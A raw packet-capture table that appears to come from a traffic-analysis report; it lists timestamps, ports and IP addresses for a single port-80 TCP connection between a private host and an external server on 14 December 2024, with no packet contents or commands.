Dec 14, 2024 23:58:37.865119934 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.865168095 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.865235090 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.865281105 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.866118908 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.866168976 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.866247892 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.866300106 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.867168903 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.867217064 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.867276907 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.867491961 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.868156910 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.868217945 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.868284941 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.868340969 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.869163036 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.869297028 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.869326115 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.869348049 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.870193958 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.870256901 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.870317936 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.870364904 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.871187925 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.871249914 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.871345043 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.871448040 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.872200012 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.872256041 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.872323036 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.872374058 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.873250008 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.873308897 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.873389006 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.873461008 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.874247074 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.874303102 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.874382973 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.874430895 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.875289917 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.875360012 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.875417948 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.875468016 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.876354933 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.876466036 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.876497030 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.876540899 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.877336979 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.877397060 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.877463102 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.877599001 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.878308058 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.878354073 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.878436089 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.878494978 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.879349947 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.879451036 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.879523993 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.879575014 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.880341053 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.880408049 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.880472898 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.880522966 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.881355047 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.881401062 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.881514072 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.881570101 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.882356882 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.882477045 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.882492065 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.882544041 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.883407116 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.883455992 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.883580923 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.883630991 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.884392977 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.884542942 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.884601116 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.885440111 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.885490894 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.885570049 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.885627985 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.886478901 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.886528015 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.886593103 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.886674881 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.887501001 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.887548923 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.887615919 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.887768984 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.888465881 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.888509035 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.888587952 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.888631105 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.889478922 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.889528036 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.889611959 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.889662981 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.890485048 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.890614986 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.890616894 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.890656948 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.891532898 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.891581059 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.891644955 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.891858101 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.892499924 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.892549992 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.892631054 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.892684937 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.893552065 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.893599033 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.893665075 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.893770933 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.894557953 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.894699097 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.894727945 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.894774914 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.895572901 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.895653963 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.895720005 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.895766973 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.896579027 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.896697044 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.896722078 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.896773100 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.897640944 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.897726059 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.897737980 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.897783041 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.898617029 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.898662090 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.898741007 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.898803949 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.899666071 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.899712086 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.039109945 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.039220095 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.039336920 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.039469957 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.039607048 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.039609909 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.039674997 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.040476084 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.040580034 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.040608883 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.040648937 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.041461945 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.041604996 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.041661024 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.042511940 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.042567015 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.042623043 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.042675972 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.043503046 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.043556929 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.043637037 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.043692112 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.044522047 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.044578075 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.044640064 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.044694901 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.045614958 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.045734882 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.045789003 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.046595097 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.046648026 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.046703100 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.046756029 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.047579050 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.047635078 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.047750950 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.047805071 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.048583031 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.048635960 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.048719883 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.049474955 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.049580097 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.049635887 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.049815893 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.049880028 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.050620079 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.050679922 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.050745010 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.050796032 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.051609993 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.051672935 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.051740885 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.051796913 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.052814960 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.052865982 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.052881002 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.052922010 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.053639889 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.053793907 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.053860903 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.054668903 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.054725885 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.054805040 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.054852009 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.055677891 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.055743933 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.055845022 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.055895090 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.056709051 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.056759119 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.056828976 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.056873083 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.057718039 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.057833910 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.057894945 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.058732033 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.058784008 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.058861971 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.058918953 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.059792995 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.059860945 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.059915066 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.059973955 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.060772896 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.060828924 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.060898066 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.060947895 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.061770916 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.061911106 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.061971903 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.062798977 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.062855005 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.062980890 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.063038111 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.063802958 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.063864946 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.063934088 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.063991070 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.064836979 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.064893961 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.064961910 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.065016031 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.065876007 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.066024065 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.066076994 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.066857100 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.066916943 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.066979885 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.067033052 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.067898035 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.067953110 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.068011045 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.068064928 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.068873882 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.068928957 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.069013119 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.069067001 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.069931030 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.069986105 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.070064068 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.070117950 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.070880890 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.070935011 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.071013927 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.071067095 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.071979046 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.072031975 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.072117090 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.072169065 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.072937965 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.072992086 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.073076963 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.073128939 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.073971033 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.074022055 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.074085951 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.074140072 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.074958086 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.075014114 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.075092077 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.075145960 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.075989008 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.076045036 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.076128960 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.076179981 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.077017069 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.077069998 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.077137947 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.077188015 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.078048944 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.078104019 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.078169107 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.078222036 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.079049110 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.079102039 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.079180002 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.079232931 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.080089092 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.080147028 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.080193996 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.080245018 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.081074953 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.081129074 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.081212044 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.081264973 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.082077026 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.082209110 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.082277060 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.083096027 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.083153009 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.083230019 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.083285093 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.084129095 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.084235907 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.084284067 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.085115910 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.085258961 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.085313082 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.086133957 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.086200953 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.086266994 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.086313963 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.087147951 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.087213993 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.087282896 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.087331057 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.088210106 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.088293076 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.088361979 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.088422060 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.089181900 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.089277029 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.089318991 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.089462042 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.090265989 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.090315104 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.090343952 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.090389967 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.091233969 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.091378927 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.091428995 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.092190027 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.092238903 CET	49841	80	192.168.2.4	185.215.113.16
